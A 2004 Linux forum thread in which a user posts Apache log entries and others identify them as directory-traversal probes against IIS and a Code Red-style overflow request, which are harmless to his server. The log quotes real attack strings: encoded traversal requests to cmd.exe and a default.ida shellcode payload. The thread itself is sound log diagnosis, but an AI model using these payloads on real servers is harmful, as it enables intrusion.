LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Networking
User Name
Password
Linux - Networking This forum is for any issue related to networks or networking.
Routing, network cards, OSI, etc. Anything is fair game.

Notices


Reply
  Search this Thread
Old 01-09-2004, 09:36 AM   #1
sal_paradise42
Member
 
Registered: Jul 2003
Location: Utah
Distribution: Gentoo FreeBSD 5.4
Posts: 150

Rep: Reputation: 16
apache logs, seeing weird things


just been looking at my apache access logs and I am noticing some weird stuff on it, when I see the date I have no idea who is getting into it or whats going on, and I have my site password protected so no one should be in it.
I will post the log, can someone see anything from it?
log ------------------------------------------------------------------------------------------

24.1.1x.x - - [09/Jan/2004:06:27:46 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1xx - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.218.x.x - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 634
 
Old 01-09-2004, 09:41 AM   #2
peter_robb
Senior Member
 
Registered: Feb 2002
Location: Szczecin, Poland
Distribution: Gentoo, Debian
Posts: 2,458

Rep: Reputation: 48
Not too much to worry about..
It's called a Directory traversal attack aimed at a M$ server, quite harmless to you.

One look at the reply headers you have sent them and they will write you off their "possible" list.
 
Old 01-09-2004, 01:35 PM   #3
sal_paradise42
Member
 
Registered: Jul 2003
Location: Utah
Distribution: Gentoo FreeBSD 5.4
Posts: 150

Original Poster
Rep: Reputation: 16
thanks for the quick response, I won't worry about it then.
 
Old 01-09-2004, 04:45 PM   #4
dubman
Member
 
Registered: Jan 2003
Distribution: Redhat 9, Fedora Core 1, Suse 8
Posts: 188

Rep: Reputation: 30
yep, this is what you call "script kiddies"
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
are these logs weird? simcox1 Linux - Security 6 11-29-2005 01:22 PM
Weird things going on with samba Cerb Linux - Software 2 03-29-2004 03:18 AM
Weird things on Mandrake 9.2 saurya_s Linux - Software 7 02-07-2004 09:28 PM
Weird things are happening saiz66 Slackware 8 05-17-2003 12:03 AM
one of those weird kinda things Crunch General 5 03-23-2003 09:54 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Networking

All times are GMT -5. The time now is 06:45 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration